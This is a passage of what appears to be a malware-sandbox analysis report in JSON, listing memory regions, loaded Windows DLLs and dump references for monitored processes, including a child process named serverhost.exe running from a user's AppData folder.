}, "size": 36864, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3575807, "entry_point": 0, "filename": null, "id": "region_1412", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:10.397", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001413-addr_0x0000000000370000-size_0x0000000000024000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_246", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 147456, "start_va": 3604480, "type": "region", "version": 1 }, "end_va": 3751935, "entry_point": 0, "filename": null, "id": "region_1413", "name": "private_0x0000000000370000", "norm_filename": null, "region_type": "private_memory", "start_va": 3604480, "timestamp": "00:01:10.397", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001414-addr_0x0000000000a70000-size_0x0000000000009000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_247", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 36864, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 10981375, "entry_point": 0, "filename": null, "id": "region_1414", "name": "private_0x0000000000a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 10944512, "timestamp": "00:01:10.397", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001415-addr_0x0000000000b00000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_248", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 11534336, "type": "region", "version": 1 }, "end_va": 12582911, "entry_point": 0, "filename": null, "id": "region_1415", "name": "private_0x0000000000b00000", "norm_filename": null, "region_type": "private_memory", "start_va": 11534336, "timestamp": "00:01:10.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 1901133824, "type": "region", "version": 1 }, "end_va": 1901445119, "entry_point": 1901145108, "filename": "\\Windows\\System32\\apphelp.dll", "id": "region_1416", "name": "apphelp.dll", "norm_filename": "c:\\windows\\system32\\apphelp.dll", "region_type": "memory_mapped_file", "start_va": 1901133824, "timestamp": "00:01:10.397", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1628700672, "type": "region", "version": 1 }, "end_va": 1648975871, "entry_point": 1628700672, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_1417", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1628700672, "timestamp": "00:01:10.402", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001418-addr_0x0000000001b30000-size_0x0000000000048000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_249", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 294912, "start_va": 28508160, "type": "region", "version": 1 }, "end_va": 28803071, "entry_point": 0, "filename": null, "id": "region_1418", "name": "private_0x0000000001b30000", "norm_filename": null, "region_type": "private_memory", "start_va": 28508160, "timestamp": "00:01:10.406", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20275200, "start_va": 1649016832, "type": "region", "version": 1 }, "end_va": 1669292031, "entry_point": 1649016832, "filename": "\\Windows\\System32\\imageres.dll", "id": "region_1419", "name": "imageres.dll", "norm_filename": "c:\\windows\\system32\\imageres.dll", "region_type": "memory_mapped_file", "start_va": 1649016832, "timestamp": "00:01:10.406", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001422-addr_0x0000000000320000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_250", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 3276800, "type": "region", "version": 1 }, "end_va": 3350527, "entry_point": 0, "filename": null, "id": "region_1422", "name": "private_0x0000000000320000", "norm_filename": null, "region_type": "private_memory", "start_va": 3276800, "timestamp": "00:01:10.417", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001426-addr_0x0000000001c90000-size_0x0000000000048000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_251", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 294912, "start_va": 29949952, "type": "region", "version": 1 }, "end_va": 30244863, "entry_point": 0, "filename": null, "id": "region_1426", "name": "private_0x0000000001c90000", "norm_filename": null, "region_type": "private_memory", "start_va": 29949952, "timestamp": "00:01:10.429", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001430-addr_0x0000000000360000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_252", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 3538944, "type": "region", "version": 1 }, "end_va": 3612671, "entry_point": 0, "filename": null, "id": "region_1430", "name": "private_0x0000000000360000", "norm_filename": null, "region_type": "private_memory", "start_va": 3538944, "timestamp": "00:01:10.440", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001434-addr_0x0000000000380000-size_0x0000000000012000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_253", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 73728, "start_va": 3670016, "type": "region", "version": 1 }, "end_va": 3743743, "entry_point": 0, "filename": null, "id": "region_1434", "name": "private_0x0000000000380000", "norm_filename": null, "region_type": "private_memory", "start_va": 3670016, "timestamp": "00:01:10.452", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001435-addr_0x0000000000340000-size_0x000000000000d000-perm_rwx.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": { "ref_id": "proc_dump_254", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 3407872, "type": "region", "version": 1 }, "end_va": 3461119, "entry_point": 0, "filename": null, "id": "region_1435", "name": "private_0x0000000000340000", "norm_filename": null, "region_type": "private_memory", "start_va": 3407872, "timestamp": "00:01:10.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1966211072, "type": "region", "version": 1 }, "end_va": 1966321663, "entry_point": 1966248889, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_1436", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1966211072, "timestamp": "00:01:10.458", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001437-addr_0x0000000000a70000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_255", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 10944512, "type": "region", "version": 1 }, "end_va": 10997759, "entry_point": 0, "filename": null, "id": "region_1437", "name": "private_0x0000000000a70000", "norm_filename": null, "region_type": "private_memory", "start_va": 10944512, "timestamp": "00:01:10.464", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1968898048, "type": "region", "version": 1 }, "end_va": 1970065407, "entry_point": 1968903562, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_1438", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1968898048, "timestamp": "00:01:12.217", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1967570943, "entry_point": 1967530894, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_1439", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:01:12.218", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1995440128, "type": "region", "version": 1 }, "end_va": 1996709887, "entry_point": 1995447093, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_1440", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1995440128, "timestamp": "00:01:12.221", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1996750848, "type": "region", "version": 1 }, "end_va": 1997754367, "entry_point": 1996757093, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_1441", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1996750848, "timestamp": "00:01:12.222", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1992687616, "type": "region", "version": 1 }, "end_va": 1994764287, "entry_point": 1992696537, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_1442", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1992687616, "timestamp": "00:01:12.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1957625856, "type": "region", "version": 1 }, "end_va": 1957720063, "entry_point": 1957633181, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_1443", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1957625856, "timestamp": "00:01:12.225", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967108095, "entry_point": 1967069586, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_1444", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:01:12.226", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947729920, "type": "region", "version": 1 }, "end_va": 1947783167, "entry_point": 1947734496, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_1445", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1947729920, "timestamp": "00:01:12.231", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001446-addr_0x0000000001f90000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_256", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 33095680, "type": "region", "version": 1 }, "end_va": 34144255, "entry_point": 0, "filename": null, "id": "region_1446", "name": "private_0x0000000001f90000", "norm_filename": null, "region_type": "private_memory", "start_va": 33095680, "timestamp": "00:01:12.240", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000009-region_00001447-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_257", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1447", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:01:12.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 94208, "start_va": 11010048, "type": "region", "version": 1 }, "end_va": 11104255, "entry_point": 0, "filename": null, "id": "region_1448", "name": "pagefile_0x0000000000a80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11010048, "timestamp": "00:01:12.240", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1952448512, "type": "region", "version": 1 }, "end_va": 1953452031, "entry_point": 1952517534, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_1449", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1952448512, "timestamp": "00:01:14.276", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 11010048, "type": "region", "version": 1 }, "end_va": 11014143, "entry_point": 0, "filename": null, "id": "region_1450", "name": "pagefile_0x0000000000a80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11010048, "timestamp": "00:01:14.278", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1986985984, "type": "region", "version": 1 }, "end_va": 1987522559, "entry_point": 1986995154, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_1451", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1986985984, "timestamp": "00:01:14.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 11075584, "type": "region", "version": 1 }, "end_va": 11079679, "entry_point": 0, "filename": null, "id": "region_1452", "name": "pagefile_0x0000000000a90000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 11075584, "timestamp": "00:01:14.286", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 11141120, "type": "region", "version": 1 }, "end_va": 11157503, "entry_point": 11141120, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1453", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 11141120, "timestamp": "00:01:14.289", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 12582912, "type": "region", "version": 1 }, "end_va": 12779519, "entry_point": 12582912, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db", "id": "region_1454", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db", "region_type": "memory_mapped_file", "start_va": 12582912, "timestamp": "00:01:14.290", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 12779520, "type": "region", "version": 1 }, "end_va": 12795903, "entry_point": 12779520, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_1455", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 12779520, "timestamp": "00:01:14.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30695423, "entry_point": 30277632, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_1456", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 30277632, "timestamp": "00:01:14.291", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 28835840, "type": "region", "version": 1 }, "end_va": 28839935, "entry_point": 0, "filename": null, "id": "region_1457", "name": "pagefile_0x0000000001b80000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 28835840, "timestamp": "00:01:14.297", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1954545664, "type": "region", "version": 1 }, "end_va": 1954680831, "entry_point": 1954550878, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_1473", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1954545664, "timestamp": "00:01:14.342", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 2000814080, "type": "region", "version": 1 }, "end_va": 2001096703, "entry_point": 2000818657, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_1474", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 2000814080, "timestamp": "00:01:14.347", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1961295872, "type": "region", "version": 1 }, "end_va": 1961385983, "entry_point": 1961307587, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_1501", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1961295872, "timestamp": "00:01:14.366", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"", "filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe", "id": "proc_10", "image_name": "serverhost.exe", "monitor_reason": "child_process", "monitored_id": 10, "origin_monitor_id": 9, "ref_parent_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000010-region_00001502-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_258", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1502", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:14.385", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1503", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:14.385", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001504-addr_0x00000000000d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_259", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 851968, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_1504", "name": "private_0x00000000000d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 851968, "timestamp": "00:01:14.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 12845056, "type": "region", "version": 1 }, "end_va": 12955647, "entry_point": 12845056, "filename": "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exeMh.exe", "id": "region_1505", "name": "serverhost.exemh.exe", "norm_filename": "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exemh.exe", "region_type": "memory_mapped_file", "start_va": 12845056, "timestamp": "00:01:14.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1294336, "start_va": 1999241216, "type": "region", "version": 1 }, "end_va": 2000535551, "entry_point": 1999241216, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1506", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1999241216, "timestamp": "00:01:14.386", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 2001600512, "type": "region", "version": 1 }, "end_va": 2001604607, "entry_point": 2001600512, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1507", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 2001600512, "timestamp": "00:01:14.387", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2147155968, "type": "region", "version": 1 }, "end_va": 2147299327, "entry_point": 0, "filename": null, "id": "region_1508", "name": "pagefile_0x000000007ffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2147155968, "timestamp": "00:01:14.389", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001509-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_260", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_1509", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:01:14.389", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001510-addr_0x000000007ffdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_261", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147348480, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1510", "name": "private_0x000000007ffdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147348480, "timestamp": "00:01:14.389", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1511", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:14.407", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 684031, "entry_point": 262144, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1512", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:01:14.407", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001513-addr_0x0000000000210000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_262", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 3211263, "entry_point": 0, "filename": null, "id": "region_1513", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:01:14.408", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001514-addr_0x00000000004c0000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_263", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4980736, "type": "region", "version": 1 }, "end_va": 5046271, "entry_point": 0, "filename": null, "id": "region_1514", "name": "private_0x00000000004c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4980736, "timestamp": "00:01:14.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 540672, "start_va": 1857355776, "type": "region", "version": 1 }, "end_va": 1857896447, "entry_point": 1857362345, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "id": "region_1515", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1857355776, "timestamp": "00:01:14.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 303104, "start_va": 1967587328, "type": "region", "version": 1 }, "end_va": 1967890431, "entry_point": 1967619552, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_1516", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1967587328, "timestamp": "00:01:14.408", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 